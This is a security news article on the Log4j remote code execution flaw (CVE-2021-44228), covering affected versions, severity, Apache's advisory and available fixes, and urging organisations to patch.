Critical Fault with Log4j Software

Attackers are actively exploiting a critical vulnerability in Apache Log4j, a logging library that's used in potentially millions of Java-based applications, including web-based ones. Organisations should immediately review if their apps, especially the publicly accessible ones, use the library and should implement mitigations as soon as possible.

This recently discovered vulnerability in Log4j 2 is reportedly being actively exploited, putting widely used applications and cloud services at high risk.

Researchers discovered a critical vulnerability in Apache Log4j library. Apache Log4j is part of the Apache Logging Project. By and large, usage of this library is one of the easiest ways to log errors, and that is why most Java developers use it. Now the Apache Software Foundation has released fixes to contain an exploited zero-day vulnerability affecting the widely-used Apache Log4j Java-based logging library that could be weaponised to execute malicious code and allow a complete takeover of vulnerable systems.

Log4j is used as a logging package in a variety of different popular software by companies including Amazon, Apple iCloud, ElasticSearch, Steam, Tesla, Twitter, and video games such as Minecraft. 

This  problem concerns a case of unauthenticated, remote code execution (RCE) on any application that uses the open-source utility and affects versions Log4j 2.0-beta9 up to 2.14.1. The bug has scored a perfect 10 on 10 in the CVSS rating system, indicative of the severity of the issue. "An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled," the Apache Foundation said in an advisory. "From Log4j 2.15.0, this behavior has been disabled by default."

Exploitation can be achieved by a single string of text, which can trigger an application to reach out to a malicious external host if it is logged via the vulnerable instance of Log4j, effectively granting the adversary the ability to retrieve a payload from a remote server and execute it locally. 

Given these problems with Log4j in enterprise IT and DevOps, it is vital for users to address the flaw immediately. 

The Israeli cyber security firm Cybereason has released a fix called Logout4Shell that closes out the shortcoming by using the vulnerability itself to reconfigure the logger and prevent further exploitation of the attack. "This Log4j (CVE-2021-44228) vulnerability is extremely bad. Millions of applications use Log4j for logging, and all the attacker needs to do is get the app to log a special string," Security expert Marcus Hutchins said in a tweet.

CERT.NZ:   Hacker News:   Marcus Hutchins:    Kaspersky:    Techtarget:   Logging Apache:   CSO Online:  

You Might Also Read: 

How To Optimize The DevSecOps Pipeline:

 

« Britain's New Deals On Digital Trade & Cyber Security
Best Programming Languages For Cyber Security In 2022 »

CyberSecurity Jobsite
Perimeter 81

Directory of Suppliers

XYPRO Technology

XYPRO Technology

XYPRO is the market leader in HPE Non-Stop Security, Risk Management and Compliance.

IT Governance

IT Governance

IT Governance is a leading global provider of information security solutions. Download our free guide and find out how ISO 27001 can help protect your organisation's information.

LockLizard

LockLizard

Locklizard provides PDF DRM software that protects PDF documents from unauthorized access and misuse. Share and sell documents securely - prevent document leakage, sharing and piracy.

Syxsense

Syxsense

Syxsense brings together endpoint management and security for greater efficiency and collaboration between IT management and security teams.

Cylance Smart Antivirus

Cylance Smart Antivirus

An antivirus that works smarter, not harder, from BlackBerry. Lightweight, non-intrusive protection powered by artificial intelligence. BUY NOW - LIMITED DISCOUNT OFFER.

Perimeter 81 / Black Hat On-Demand Webinar

Perimeter 81 / Black Hat On-Demand Webinar

Black Hat On-Demand Webinar - Identity is the New Perimeter: This webinar will provide you with vital insights to help understand the need for Zero Trust and how it can transform your network.

DigitalStakeout

DigitalStakeout

DigitalStakeout enables cyber security professionals to reduce cyber risk to their organization with proactive security solutions, providing immediate improvement in security posture and ROI.

Practice Labs

Practice Labs

Practice Labs is an IT competency hub, where live-lab environments give access to real equipment for hands-on practice of essential cybersecurity skills.

iXsystems

iXsystems

iXsystems is a leader in Open-Source enterprise server and storage solutions including Backup & Recovery to protect critical data.

Averon

Averon

Averon's technology is the new gold standard for digital identity - the easiest, fastest and most secure verification solution for users on both WiFi and LTE.

Electronic Security Service (ESS)

Electronic Security Service (ESS)

ESS is a coordinating state authority, which provides coordination of the activity of the entities of information infrastructure in Azerbaijan.

LATRO Services

LATRO Services

LATRO Services is a complete solution provider to discover, locate, and eliminate telecom fraud.

Hackinsure

Hackinsure

Front Row Insurance’s Hackinsure provides protection against online hazards including Cyber Liability, Theft & Fraud, Business Interruption, Extortion & Ransomware, Forensic Investigation.

ValueMentor

ValueMentor

ValueMentor is a leading cyber security service provider in the Middle East. We enable clients to reduce risk by taking a strategic approach to cybersecurity.

Berezha Security Group (BSG)

Berezha Security Group (BSG)

BSG is a cybersecurity consulting firm specializing in all aspects of application security and penetration testing.

Nucleus Cyber

Nucleus Cyber

Nucleus Cyber is a provider of advanced information protection solutions that prevent data loss and protect against insider threats.

OSI Security

OSI Security

OSI Security's primary services include penetration testing, security auditing, web application security testing and risk management.

Resolvo Systems

Resolvo Systems

Resolvo is provides comprehensive security assessment and testing services in Asia.